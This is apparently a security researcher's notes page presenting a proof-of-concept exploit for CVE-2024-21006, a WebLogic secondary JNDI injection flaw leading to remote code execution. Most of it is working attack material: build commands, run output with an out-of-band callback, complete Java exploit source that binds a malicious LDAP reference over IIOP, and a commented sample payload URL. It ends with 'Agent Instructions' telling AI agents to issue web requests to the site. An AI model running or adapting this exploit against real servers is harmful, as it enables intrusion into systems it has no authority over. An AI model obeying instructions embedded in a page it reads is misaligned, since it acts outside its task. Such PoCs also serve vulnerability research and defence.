# WebLogic - CVE-2024-21006
CVE-2024-21006 reveals a new WebLogic attack method: secondary JNDI injection, that is, triggering JNDI injection during the JNDI injection process, thereby completing **RCE**.
Project is based on the findings of [pwnull](https://pwnull.github.io/2024/oracle%20weblogic%20CVE-2024-21006%20Double-JNDInjection%20RCE%20analyze/) and code from [momika223](https://github.com/momika233/CVE-2024-21006).
## Proof-of-Concept
### Oracle 14.1.1.0
```bash
apt :: ~ » docker container ls
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
fa9822b7dfd5 container-registry.oracle.com/middleware/weblogic:14.1.1.0 "/u01/oracle/createA…" 23 hours ago Up 2 hours 0.0.0.0:7001->7001/tcp, :::7001->7001/tcp, 0.0.0.0:9002->9002/tcp, :::9002->9002/tcp 14110-weblogic
```
Prepare the environment by uploading `MainClass.java` and `META-INF/MANIFEST.MF` to the WebLogic container.
```bash
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MainClass.java
[oracle@14110-weblogic lib]$ curl -OL 172.17.0.1/MANIFEST.MF
[oracle@14110-weblogic lib]$ mkdir META-INF
[oracle@14110-weblogic lib]$ mv MANIFEST.MF META-INF/
```
Compile the code.
```bash
[oracle@14110-weblogic lib]$ javac -cp /u01/oracle/wlserver/server/lib/weblogic.jar MainClass.java
[oracle@14110-weblogic lib]$ ls -al | grep MainClass
-rw-rw-r-- 1 oracle oracle 2033 Oct 10 08:03 MainClass$1.class
-rw-rw-r-- 1 oracle oracle 1386 Oct 10 08:03 MainClass.class
-rw-rw-r-- 1 oracle oracle 3717 Oct 10 08:01 MainClass.java
[oracle@14110-weblogic lib]$ jar cvfm cve-2024-21006.jar META-INF/MANIFEST.MF *.class
added manifest
adding: MainClass$1.class(in = 2033) (out= 671)(deflated 66%)
adding: MainClass.class(in = 2161) (out= 1100)(deflated 49%)
```
```bash
[oracle@14110-weblogic lib]$ java -jar cve-2024-21006.jar
Target IP: 127.0.0.1
Target Port: 7001
RMI Address (ip:port/exp): wssm1qvzn5i56ehqjskcwdmtckib639ry.oastify.com
```
Burp Collaborator callback indicating a successful exploit attempt
## Source code
```java
// MainClass.java
import weblogic.j2ee.descriptor.InjectionTargetBean;
import weblogic.j2ee.descriptor.MessageDestinationRefBean;
import javax.naming.*;
import java.util.Scanner;
import java.util.Hashtable;
import java.util.Random;
public class MainClass {
public static void main(String[] args) throws Exception {
Scanner scanner = new Scanner(System.in);
System.out.print("Target IP: ");
String ip = scanner.nextLine();
System.out.print("Target Port: ");
String port = scanner.nextLine();
System.out.print("RMI Address (ip:port/exp): ");
String rmiexp = scanner.nextLine();
Random bindname = new Random();
int bindint = bindname.nextInt(10000);
// String ip = "127.0.0.1";
// String port = "7001";
// String rmiurl = "ldap://192.168.0.103/cVLtcNoHML/Plain/Exec/eyJjbWQiOiJ0b3VjaCAvdG1wL3N1Y2Nlc3MxMjMifQ==";
String rhost = String.format("iiop://%s:%s", ip, port);
Hashtable env = new Hashtable();
// add wlsserver/server/lib/weblogic.jar to classpath,else will error.
env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
env.put(Context.PROVIDER_URL, rhost);
Context context = new InitialContext(env);
// Reference reference = new Reference("weblogic.application.naming.MessageDestinationObjectFactory","weblogic.application.naming.MessageDestinationObjectFactory","");
weblogic.application.naming.MessageDestinationReference messageDestinationReference=new weblogic.application.naming.MessageDestinationReference(null, new MessageDestinationRefBean() {
@Override
public String[] getDescriptions() {
return new String[0];
}
@Override
public void addDescription(String s) {
}
@Override
public void removeDescription(String s) {
}
@Override
public void setDescriptions(String[] strings) {
}
@Override
public String getMessageDestinationRefName() {
return null;
}
@Override
public void setMessageDestinationRefName(String s) {
}
@Override
public String getMessageDestinationType() {
return "weblogic.application.naming.MessageDestinationReference";
}
@Override
public void setMessageDestinationType(String s) {
}
@Override
public String getMessageDestinationUsage() {
return null;
}
@Override
public void setMessageDestinationUsage(String s) {
}
@Override
public String getMessageDestinationLink() {
return null;
}
@Override
public void setMessageDestinationLink(String s) {
}
@Override
public String getMappedName() {
return null;
}
@Override
public void setMappedName(String s) {
}
@Override
public InjectionTargetBean[] getInjectionTargets() {
return new InjectionTargetBean[0];
}
@Override
public InjectionTargetBean createInjectionTarget() {
return null;
}
@Override
public void destroyInjectionTarget(InjectionTargetBean injectionTargetBean) {
}
@Override
public String getLookupName() {
return null;
}
@Override
public void setLookupName(String s) {
}
@Override
public String getId() {
return null;
}
@Override
public void setId(String s) {
}
}, "ldap://" + rmiexp, null, null);
context.bind("pthree"+bindint,messageDestinationReference);
context.lookup("pthree"+bindint);
}
}
```
```java
// META-INF/MANIFEST.MF
Manifest-Version: 1.0
Main-Class: MainClass
Class-Path: /u01/oracle/wlserver/server/lib/weblogic.jar
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/oracle/weblogic-cve-2024-21006.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.